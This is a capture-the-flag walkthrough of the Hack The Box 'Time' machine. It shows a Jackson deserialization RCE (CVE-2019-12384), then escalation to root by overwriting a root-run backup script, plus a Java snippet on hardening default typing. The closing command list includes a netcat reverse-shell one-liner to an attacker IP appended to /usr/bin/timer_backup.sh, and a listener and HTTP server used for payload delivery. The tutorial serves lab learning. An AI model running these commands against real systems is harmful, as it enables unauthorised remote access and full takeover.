Introduction

In this walkthrough, we cover a JSON deserialization vulnerability in the Jackson library, using the "Time" machine from Hack The Box for demonstration purposes.

CVE Description

FasterXML jackson-databind 2.x before 2.9.9.1 might allow attackers to have a variety of impacts by leveraging failure to block the logback-core class from polymorphic deserialization. Depending on the classpath content, remote code execution may be possible.

Source: https://nvd.nist.gov/vuln/detail/CVE-2019-12384

Skills Learned

JSON deserialization (Jackson)

Initial Reconnaissance (Recon)

I started by running an nmap scan on the target IP address to see what ports were open. The scan showed two open ports:

  • Port 22 (SSH)
  • Port 80 (HTTP), which had an “Online JSON parser” title.

That “Online JSON parser” title was a big clue, so I decided to focus on the web service on port 80.

Exploiting JSON Deserialization (Getting a User Shell)

When I went to the website, I found an "Online JSON Beautifier & Validator." I tried a few inputs, and when I entered an invalid JSON string I got a very specific error message: "Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException…".

This error revealed that the site was using the Jackson library, which has a well-known history of polymorphic JSON deserialization vulnerabilities. A quick Google search led me to a GitHub repository with a proof of concept for a Jackson RCE (remote code execution) vulnerability.

The proof of concept (PoC) works by supplying a specially crafted URL that makes the target fetch and execute a script from a remote server, so I created a file called inject.sql on my own machine containing a Java payload that would give me a reverse shell.

I then set up a Python HTTP server on my machine to serve the inject.sql file and a Netcat listener to catch the reverse shell. I pasted the crafted payload into the JSON beautifier on the target machine, and boom! I had a shell as the pericles user.
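The bug class above is only reachable when the application has told Jackson to accept client-supplied type names (global default typing, or an equivalent @JsonTypeInfo on an Object-typed property). As an added illustration, not code from the original post or from the Jackson project, the snippet below shows that weak ObjectMapper configuration next to a hardened form available since Jackson 2.10, which restricts polymorphic subtypes to an allowlist; the com.example.model package prefix and the sample input are assumptions.

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class JacksonTypingDemo {

    // Weak: global default typing with no validator. Any instantiable class on
    // the classpath becomes a candidate type id, which is what CVE-2019-12384
    // (the logback-core gadget) and its siblings rely on.
    static ObjectMapper weakMapper() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL); // deprecated since 2.10
        return mapper;
    }

    // Hardened (Jackson 2.10+): only subtypes under the application's own
    // package may be named by the client. "com.example.model." is an assumed
    // package prefix; adjust it to the real model package.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")
                .build();
        ObjectMapper mapper = new ObjectMapper();
        mapper.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return mapper;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample: the two-element array form Jackson uses for type
        // ids under default typing. A benign JDK class stands in for a gadget.
        String untrusted = "[\"java.util.HashMap\", {\"k\": \"v\"}]";

        Object loose = weakMapper().readValue(untrusted, Object.class);
        System.out.println("weak mapper instantiated: " + loose.getClass().getName());

        try {
            hardenedMapper().readValue(untrusted, Object.class);
            System.out.println("unexpected: type id was accepted");
        } catch (InvalidTypeIdException e) {
            // The validator denies every type id outside the allowlist.
            System.out.println("hardened mapper rejected type id: " + e.getTypeId());
        }
    }
}
```

Upgrading jackson-databind only extends the built-in denylist of known gadgets; disabling default typing or using an explicit allowlist as above removes the attack surface regardless of what else is on the classpath.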

Privilege Escalation (Getting a Root Shell)

Now that I had a user shell, it was time to get root. I started looking for SUID binaries and writable files and found a suspicious script called timer_backup.sh in /usr/bin/ that was owned by root.

I couldn't read the script, but I figured it was probably being executed by root and that I, as the pericles user, could write to it. So I modified the script to execute a reverse shell as root.

I set up another Netcat listener, and after a short wait, the timer_backup.sh script was executed by root, and I had a root shell! I then navigated to the /root directory and grabbed the root.txt flag.

Technical Commands Used

Here are the technical commands I used in the terminal during the demonstration:

  • sudo nmap -sV -Pn 10.10.10.214
  • sudo mkdir Time
  • sudo chown -R motasem:motasem Time
  • sudo nano inject.sql
  • sudo mv inject.sql Time
  • sudo python3 -m http.server
  • nc -lvp 4545
  • sudo nano payload.rb
  • sudo ruby payload.rb
  • id
  • python3 -c 'import pty;pty.spawn("/bin/bash")'
  • whoami
  • cd /
  • ls -la /usr/bin
  • cat /usr/bin/timer_backup.sh
  • echo '#!/bin/bash' > /usr/bin/timer_backup.sh
  • echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 4545 >/tmp/f' >> /usr/bin/timer_backup.sh
  • cat /root/root.txt

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.